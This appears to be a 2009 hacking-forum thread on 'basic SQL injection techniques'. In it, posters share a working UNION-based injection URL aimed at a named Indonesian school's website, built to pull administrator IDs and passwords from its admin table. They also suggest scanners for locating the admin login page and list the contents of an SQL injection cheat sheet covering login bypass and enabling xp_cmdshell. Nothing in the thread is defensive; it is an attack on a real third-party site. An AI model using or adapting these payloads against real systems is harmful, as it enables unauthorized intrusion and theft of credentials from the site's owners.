Re: Basic SQL Injection Techniques Season 1
Posted: Sat Jul 04, 2009 9:28 pm
Let me give this a try, bro!
The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/
Code:
http://www.sman1karangnongko-klt.sch.id/berita.php?ID=-31+union+all+select+1,2,3,group_concat(fs_id,0x3a,fs_password,0x3a,fs_kat),5,6,7,8,9,10+from+t_admin--
Try using nikto or acunetix, bro, to find the login page...
vodork wrote:
Let me scribble a bit here, bro,
rather than creating a new topic and just cluttering things up.
I haven't found the login page yet.
Code:
http://www.sman1karangnongko-klt.sch.id/berita.php?ID=-31+union+all+select+1,2,3,group_concat(fs_id,0x3a,fs_password,0x3a,fs_kat),5,6,7,8,9,10+from+t_admin--
I've searched all over and still haven't found it.
Can anyone?
Please guide me....
I'm still a newbie...
Thanks in advance...
Code:
Table Of Contents
1. About SQL Injection Cheat Sheet
2. Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
    1. Line Comments
        * SQL Injection Attack Samples
    2. Inline Comments
        * Classical Inline Comment SQL Injection Attack Samples
        * MySQL Version Detection Sample Attacks
    3. Stacking Queries
        * Language / Database Stacked Query Support Table
        * About MySQL and PHP
        * Stacked SQL Injection Attack Samples
    4. If Statements
        * MySQL If Statement
        * SQL Server If Statement
        * If Statement SQL Injection Attack Samples
    5. Using Integers
    6. String Operations
        * String Concatenation
    7. Strings without Quotes
        * Hex based SQL Injection Samples
    8. String Modification & Related
    9. Union Injections
        * UNION – Fixing Language Issues
    10. Bypassing Login Screens
    11. Enabling xp_cmdshell in SQL Server 2005
    12. Other parts are not so well formatted but check out by yourself, drafts, notes and stuff, scroll down and see.